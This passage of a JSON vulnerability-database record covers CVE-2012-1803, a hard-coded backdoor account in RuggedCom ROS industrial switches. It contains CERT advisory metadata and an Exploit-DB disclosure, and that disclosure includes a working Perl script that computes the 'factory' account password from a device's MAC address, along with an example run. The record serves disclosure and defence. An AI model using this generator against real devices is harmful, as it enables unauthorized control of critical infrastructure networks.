<http://www.wired.com/threatlevel/2012/04/ruggedcom-backdoor/>\n * <http://www.ruggedcom.com/products/index.php>\n * <http://www.ruggedcom.com/support/software/index.php>\n * <http://cwe.mitre.org/data/definitions/261.html>\n * <http://www.ruggedcom.com/productbulletin/ros-security-page/>\n * <https://www.us-cert.gov/control_systems/pdf/ICSA-12-146-01.pdf>\n * 
<http://www.us-cert.gov/control_systems/pdf/ICSA-12-146-01A.pdf>\n\n### Acknowledgements\n\nThanks to Justin W. Clarke, an independent security researcher in San Francisco, California, for reporting this vulnerability. Thanks also to ICS-CERT for testing and additional coordination with RuggedCom.\n\nThis document was written by Michael Orlando and Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-1803](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-1803>) \n---|--- \n**Date Public:** | 2012-04-23 \n**Date First Published:** | 2012-04-24 \n**Date Last Updated:** | 2012-07-18 20:09 UTC \n**Document Revision:** | 67 \n", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "cert", "title": "RuggedCom Rugged Operating System (ROS) contains hard-coded user account with predictable password", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1803"], "modified": "2012-07-18T20:09:00", "id": "VU:889195", "href": "https://www.kb.cert.org/vuls/id/889195", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "description": "RuggedCom's Rugged Operating System backdoor account.", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "securityvulns", "title": "RuggedCom SCADA equipment backdoor", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1803"], "modified": "2012-04-24T00:00:00", "id": "SECURITYVULNS:VULN:12347", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:VULN:12347", "sourceData": "", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2023-06-07T16:19:31", "description": "", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "exploitdb", "title": "RuggedCom Devices - Backdoor Access", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-1803", "2012-2441", "CVE-2012-1803"], "modified": "2012-04-24T00:00:00", "id": "EDB-ID:18779", "href": "https://www.exploit-db.com/exploits/18779", "sourceData": "Title: Undocumented Backdoor Access to RuggedCom Devices\nAuthor: jc\nOrganization: JC CREW\nDate: April 23, 2012\nCVE: CVE-2012-1803\n\nBackground:\nRuggedCom is one of a handful of networking vendors who capitalize on\nthe market for \"Industrial Strength\" and \"Hardened\" networking\nequipment. You'll find their gear installed in traffic control\nsystems, railroad communications systems, power plants, electrical\nsubstations, and even US military sites. Beyond simple L2 and L3\nnetworking these devices are also used for serial-to-ip conversion in\nSCADA systems and they even support modbus and dnp3. RuggedCom\npublished a handy guide to some of their larger customers at\nwww.ruggedcom.com/about/customers/. 
My favorite quote is from a\ncontractor who installed RuggedCom equipment at a US Air Force base:\n\"Reliability was not an option.\" How unfortunately apropos.\n\nProblem:\nAn undocumented backdoor account exists within all released versions\nof RuggedCom's Rugged Operating System (ROS\u00ae). The username for the\naccount, which cannot be disabled, is \"factory\" and its password is\ndynamically generated based on the device's MAC address. Multiple\nattempts have been made in the past 12 months to have this backdoor\nremoved and customers notified.\n\nExploit:\n#!/usr/bin/perl\nif (! defined $ARGV[0]) {\nprint \"+========================================== \\n\";\nprint \"+ RuggedCom ROS Backdoor Password Generator \\n\";\nprint \"+ JC CREW April 23 2012 \\n\";\nprint \"+ Usage:\\n$0 macaddress \\n\";\nprint \"+========================================== \\n\";\nexit; }\n$a = $ARGV[0];\n$a =~ s/[^A-F0-9]+//simg;\n@b = reverse split /(\\S{2})/,$a;\n$c = join \"\", @b;\n$c .= \"0000\";\n$d = hex($c) % 999999929;\nprint \"$d\\n\";\n\nExample usage:\nGiven a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some\nperl and learn that the password for \"factory\" is 60644375.\n\n[jc@pig.aids ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00\n60644375\n[jc@pig.aids ros]$\n\nShoutouts:\nCERT/CC for doing great work in trying to get vendors to actually fix things.\nJC CREW\n\nTimeline:\nApr 2011 - Vendor notified directly\nJul 2011 - Vendor verbally acknowledges knowledge of backdoor,\nand ceases communication.\nFeb 11 2012 - US-CERT notified\nMar 12 2012 - Vendor responds to US-CERT.\nApr 06 2012 - Due to lack of further contact by vendor, CERT sets\npublic disclosure for April 13 2012\nApr 10 2012 - Vendor states they need another three weeks to alert\ntheir customers, but not fix the vulnerability.\nApr 11 2012 - Clarification requested regarding need for additional three weeks.\nApr 23 2012 - No response from 
vendor.\nApr 23 2012 - This disclosure.\n\nKeywords:\nRuggedCom\nROS\nRuggedSwitch\nRuggedServer\nbackdoor", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/hardware/remote/18779.txt", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}]}